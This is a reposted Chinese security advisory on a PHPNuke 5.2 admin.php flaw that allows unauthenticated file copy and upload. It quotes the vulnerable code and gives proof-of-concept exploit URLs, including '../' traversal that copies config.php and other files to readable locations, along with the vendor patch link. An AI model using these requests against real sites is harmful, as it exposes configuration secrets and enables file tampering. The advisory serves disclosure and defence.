PHPNuke 文件泄漏和上传漏洞-招考学习网,电脑基础知识,系统优化,平面设计,网站开发,论文文档,英语课堂，电子商务，创业-每日搜索一点点，进步一点点！

当前位置：

首页 > 学习 > 电脑学习 > 操作系统 > Linux > 系统安全 > 正文

PHPNuke 文件泄漏和上传漏洞

http://www.zk168.com.cn 招考学习网 2006-3-11 9:57:06

-----------------------------------------------------------[交流]-[打印]-[发送]-[收藏]--

受影响的系统:
PHPNuke 5.2 以及更低版本
描述:
--------------------------------------------------------------------------------
PHPNuke是一个流行的web论坛程序。它的某些版本中存在一个安全问题，可能导致远程
攻击者获取系统上的敏感信息或者上载程序。问题处在admin.php在处理文件拷贝和上传
时没有检查用户是否已经通过了管理员身份认证。

有问题的代码在：

$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
copy($userfile,$basedir.$wdir.$userfile_name);
$lastaction = ""._UPLOADED." $userfile_name --> $wdir";
// This need a rewrite -------------------------------------> OMG! WE
AGREEEEEEEE lmao
//include("header.php");
//GraphicAdmin($hlpfile);
//html_header();
//displaydir();
$wdir2="/";
chdir($basedir . $wdir2);
//CloseTable();
//include("footer.php");
Header("Location: admin.php?op=FileManager");
exit;
}

攻击者可以获取CGI有权读取得任意文件的内容，上传文件也是可能的。

<*来源：supergate (supergate@twlc.net)
链接：http://archives.neohapsis.com/archives/bugtraq/2001-09/0203.html
*>

测试程序：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

supergate (supergate@twlc.net) 提供了如下测试方法：

http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&
wdir=/images/&userfile=config.php&userfile_name=hacked.txt
这将config.php文件拷贝到/images/hacked.txt,使用
http://www.server.net/images/hacked.txt 即可看到该文件内容。

Paul Starzetz (paul@starzetz.de)发现通过在目录中指定"../"，甚至
可以拷贝任意目录下的文件到任意可写目录：
http://somehost/nukepath/admin.php?upload=1&file=config.php&file_name=hacked.txt
&wdir=/../../../../../../../tmp/&userfile=config.php&userfile_name=hacked.txt

http://somehost/nukepath/admin.php?upload=1&wdir=/../../../../../../../tmp&
userfile=/../../../../../../../tmp/copyme.txt&
userfile_name=/../../../../../../../tmp/hacked.txt

root@somehost:/tmp > ls -la
total 20
drwxrwxrwt 8 root root 2048 Sep 25 13:37 .
drwxr-xr-x 19 root root 2048 Feb 28 2001 ..
drwxrwxrwt 2 root root 2048 Mar 6 2001 .X11-unix
-rw-r--r-- 1 root root 851 Sep 25 13:37 copyme.txt
-rwxr-xr-x 1 wwwrun wwwrun 851 Sep 25 13:37 hacked.txt

--------------------------------------------------------------------------------
建议:

厂商补丁：

厂商已经提供了升级补丁，您可以在下列地址下载：
http://www.nukeaddon.com/download.php?op=getit&lid=27

-----------------------------------------------------------[交流]-[打印]-[发送]-[收藏]--

最新入库:

相关内容:

网友点评:

会员名称：	密码：匿名 ·注册·忘记密码？

评论内容： (最多300个字符)
	查看评论

友情提醒：
1.库中的资料大都来自互联网、网友上传、各类书籍，在录入的过程中难免会出现错误，恳请网
友来信指正！
2.如果网友在本库中未能找到所需要的材料，请登陆到我们的论坛《招考学习网》版块！
3.考友想加入招考学习网的编辑部，请发信到XueXiWang#Gmail.com(#改为@)附带个人简历
4.如需转载请注明出处及作者，谢谢合作！
5.如果您有更好的建议或意见请EMAIL：XueXiWang#Gmail.com (#改为@)
6.凡标题中有注有“[NO]”字样均不含答案且答案整理中.
7.如本库中转载文章涉及版权等问题，请相关网站或作者在两周内发邮件通知(EMAIL： XueXiWang#Gmail.com (#改为@))我们,我们接到通知后立即删除该文章及链接！

你问我答

更多>>